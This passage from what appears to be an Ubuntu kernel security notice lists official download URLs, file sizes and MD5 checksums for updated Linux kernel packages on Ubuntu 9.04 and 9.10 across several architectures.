http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_i386.deb\n      Size/MD5:   676386 672cfd17c45527cfcc4b74abad9f652d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_i386.deb\n      Size/MD5: 24657574 7a23546eec680913e2335da9389181da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_i386.deb\n      Size/MD5: 24781358 fd198c0b13ba70eadc83348ae87cf2f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_i386.deb\n      Size/MD5: 10250202 cdd81611c7865173650be382716316c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_i386.deb\n      Size/MD5:   767068 fbe363b42e813979a49a7444adface7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   218104 238d1fa355579b3e5c3b9a5f409ba412\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   174930 6c69f1ebda0371c7145ba0889931890b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    30066 f825580f63a3220d9ec048f5660309c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   262836 1ea6cea34f931354abe2c01aa8698f01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:  2110024 0ad4a3aab3642c6ff44b65e2155483d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   150224 04dcd6e520494576ac6e06aa863e73d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   184330 40e357d4f7c99b886a6b7a00170177a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   143594 38768a0d3f979c7cd662d6f2d23b4a68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    34576 dd9d68b4aa49cd96d1a4957ea1758668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:     5506 9e285ac21f1486b3ac73103b3e96fd40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    86008 578f19d536439c1b0aada7f86ccb7241\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    47638 fe2306b25d5f55bd6566a0c2291505dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:     8714 342c255e7f6fb6cc33b68075f0e21550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    44690 94d2c332f5947f4dce037570ce39b35e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    14778 0fe26ba732bfbe35baf944ae3b0e0bf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:  1446006 a016a4624c870f7359e89d436e94bfca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    44098 8a7b3746af4ee04b564c8bd8caf17027\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    69286 f10cde36cc89019b0a2cc3ca37dd1570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   119542 b1a3003512dc0814ad58c46d29cea106\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    12676 17546e9dd8ca873e2b2ab89c04274faf\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   215272 2da99e7865fed571480c1daf83362c2c\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    46658 d88e490bb0b9783884ee8c7d7268af02\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    40958 658c3596adb419ab460d1bec285c84ea\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    47310 20f31bf3e8154ce4e165a26ee05829b0\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    86524 220c27bce804ca2f28a07b1aa05a6724\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    33270 77f0d3419e8bce3aadab46745a89da47\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   523812 ca9ae4910b3b80db2b5f66df497b97bf\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   125274 df84493025631f40a26684e18fcbdcad\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    63562 aa198524f22feac47e6afeb90b4814a3\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   300758 e2f88dfcf8062c76ba8feb73009c470c\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:  3036096 18ba173775e4bd72614757f96464f43b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-19-lpia_2.6.28-19.61_lpia.deb\n      Size/MD5:   643960 a59344b6416b7986fc4e381d2cff448b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-19-lpia_2.6.28-19.61_lpia.deb\n      Size/MD5: 21804176 6d5ada4bd63dc0267ec128ec5523d603\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_lpia.deb\n      Size/MD5:   767048 119ec87226497a4cd35ac1616c110f8b\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   303974 013d213d0147879eaf3b03ee5a52ba62\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   157420 daa1b45750cf096ca0f21c2e9805338c\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    24444 a4604496dbae27099d5e99be02661e86\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   260358 050d3379257c6db05af1d9cbea5246e5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:  2027504 b41779f2e28f1a64bfef1328e0d46025\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   149404 0b24ae1029ee3377f090ce81937f591b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   184738 4a4709ebe1e07dba8e80164d5d99457e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   143256 93d56d8675a88d483b206a0bd915cc10\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    34466 b307ad93ea4f7c264c20833070f32599\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:     5496 ae5a05934e8cb5b52e0793ba2bf8804b\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    85658 c8746bbbb6796a2bff3fa6b336ed74b4\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    47404 6230bb1e8b46bd653ac5d3ef9d9052b7\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:     8712 fed56dd339cc12bb2c623a54da9d5b3a\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    63108 18cf630fa14beb0692f7398167e8b691\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    14718 8ee6802e848c75ca39da8ee1e02f0314\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:  1447856 77369ff1a3bd4417251f3f1de7dc504f\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    43896 f514d1c6dc5f0edf987eab1993eff850\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   155176 0dd0d60e9685c6f1f092e7fba12f0d2c\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   172682 daee398b65ec579129a974398bafe526\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:     8152 f19e4bed18e1f803f2403c1f76bb4567\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.diff.gz\n      Size/MD5:  9270340 efbacad31add4310d608052e0138cdfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.dsc\n      Size/MD5:     2706 ab7417b57fac2e918ab18b71748eaa25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.diff.gz\n      Size/MD5:  4002602 7156a2ff98e4a29eca8db92dd27cae34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.dsc\n      Size/MD5:     2180 e004ede760b9ead8acfb08aae3626bd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.diff.gz\n      Size/MD5:  4613937 a6d34bc737f45065a7856ca478f09ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.dsc\n      Size/MD5:     2214 2387eb27814bd67f0788fd0450f400ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.diff.gz\n      Size/MD5:  2968144 51d9f41be632d0069d48b6fb7c53b059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.dsc\n      Size/MD5:     3782 1027672ce46ed3c00dd0fcc4682a64f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-307.15_all.deb\n      Size/MD5:  3801110 11ec385a097f99220d5ddb6c2e2f4002\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-307.15_all.deb\n      Size/MD5: 64261132 ed0333508c22109f028ae2ef766fc85f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307_2.6.31-307.15_all.deb\n      Size/MD5:  9674276 489c1295818e3e5ee4832104c483a0ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-22.60_all.deb\n      Size/MD5:  3802616 a36b05da0395ec7db681dc19fb2f1300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22_2.6.31-22.60_all.deb\n      Size/MD5:  9542888 f10672f2db8403df76eca5b20694b8f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-22.60_all.deb\n      Size/MD5: 62194756 b7cc137763d5af113a71e31e6ac22f78\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_amd64.deb\n      Size/MD5:   611656 2c695d1b064b808c1a2302ab2b886977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_amd64.deb\n      Size/MD5: 18766724 49915d82add98b1256e69fe1bfe8078e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   221404 254b05d713505665c031b4496b163c22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    15634 c74946f44729c910272e9ea7818630b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    52140 f69d9ea44c436108e9d12948b8136090\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    44830 cf091e89005a5a90931b7f752bdadf69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    50086 7aeca28683007786d5ebd9ef1ed3ac26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    92532 b98c59ba794fd8779c7d72bfaaed0197\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    37776 b8bef8f976de7b77be419a138bcae78b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   537596 6b955d65ff2d68e8d95051cf094907c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   130680 f33ba0ee944acc4719c2967a1dcabdb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    53836 f67f7cc6ef67dcf7f672fd569a89452f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   310082 9c1873f4f9d43672eb590a7321e1d6f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:  4360720 16490513f45ae6688ed2bde11abf9e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_amd64.deb\n      Size/MD5:   708238 ece5100190ee7b1cfe205a988482f652\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-server_2.6.31-22.60_amd64.deb\n      Size/MD5:   706794 eabe25a6ab5ecf566b6155d1e40b098b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_amd64.deb\n      Size/MD5: 28945438 dcaf7dcfd8fd1bb8396403a8385f00c6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-server_2.6.31-22.60_amd64.deb\n      Size/MD5: 28940552 0345077dd48fee880de7036f7b9565ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_amd64.deb\n      Size/MD5: 11766174 dd131468e97785447d16e271b9f0c96e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_amd64.deb\n      Size/MD5:   753492 0a0b60ed5f9fd5317d117b348c25a226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   168332 2698dddf736f1f55b43ee796f36025d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   202808 83c4daba95357805420dfd042b326624\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    27744 04f33c682c35a27fb0622c0ccfc64539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   311822 4748943e01de51f9fa0afe1e6667ba11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:  2281794 cc0444cb92dfe6d42f1c29cf37020399\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   158660 ddaf46384d9657ea1afd15f0b7a04381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   203114 0a8ba89a3ac2c15fba026750b7724b9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   161070 67957e42b693445a8bec0d1e65e55026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    38052 7f306f8d2cab050417d6cb38857b5d5a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:     5762 39e5dbb1081ba9537468d1a927fd0da2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    73772 a4bad6ca01c03a927453ad26b099cce4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    22250 53b93aabb270063d193571b49d95b9e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:     9538 29dde3870380ac336fbacaf92ba229ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    39852 7e7b6dc05ceb31ac128631131cc4d523\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    23488 023007868ca9edada0fb2c92805d9683\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:  1389890 cb421da7cd9f9dc1c2b7920d3cbd5d26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    47372 76db327e946e56267ebb075149dd74d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    51746 2d218a60e0c7df2b655e8dbde3b8fde0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   129008 8e259b2e63ad1b7540ab5e280fd1185b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    15818 bd77ac1c53d4013fd44d6e08e0607a0d\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_i386.deb\n      Size/MD5:   583698 c74a1a2666674f9f7868022638a44eec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_i386.deb\n      Size/MD5: 18098198 aa80a9877a0e8e66b3eaeedf106d2735\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   198856 75a1fabea67826c04b3f970855301f66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    32460 debd7f409c0590fbf8c54e4bfd353b0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    49946 a1fd0118b8702be8c81173ac13de49f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    42114 8ad595e8510acc850d85f2b15409c398\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    45944 fe33cb34669e234be9c67b10786438e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    87406 f8c4148cb3a8f30c7a59e5dae4771175\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    33766 fbea3cb1763e19feb0994cf8500132de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   534130 2d58da5dee752af1baedeb14a08c5f96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   128170 4723852ff55df632006c4927d13f114f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    49746 a976e85f8ee996273f27a347df71a409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   295730 69eac5e852238c1a21440a9241b14832\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:  4196436 e5b97c5775a2511f10966890095da19f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-386_2.6.31-22.60_i386.deb\n      Size/MD5:   685230 67f5b3274f3a20bb452797106ec9f137\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb\n      Size/MD5:   687020 7d21f4a09ce0a273cb6d7503e72ee6ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_i386.deb\n      Size/MD5:   686244 65573f1a4fa26cf1d025885ba2cebbbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-386_2.6.31-22.60_i386.deb\n      Size/MD5: 28823902 18b1320dcc9bc2283011911c04237711\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb\n      Size/MD5: 28958792 dc3e36f69d9881d9d26e8cd2c44800cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_i386.deb\n      Size/MD5: 28891678 aae1afae57ad58337b6454bb13ae72a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_i386.deb\n      Size/MD5: 11300176 dc82553b7990534cc39f9f4cc4e00f87\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_i386.deb\n      Size/MD5:   753460 b871864698fe96c8c053de1ab7d28b3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   172874 cf867621a1c6af7d2df0b32c31d47f3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   186174 421f2c1b6a7a9211742bcd0116d5b16e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    28924 bf4c063e743601b1838970be5eb4665f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   292874 8b3015efe3f52550b68f137e72be5632\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:  2400172 d3a5e3e28a6f54f5ac55255fefe8d753\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   142002 863be5985847e2c869ccb738ea6eacf7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   189594 5451c54d33a9917ef47a39385a2d60a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   148538 4f7e33f693ccc7d0fd540942fef72b5a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    35292 8faa6b0d2be91563e4f946a97752a550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:     6840 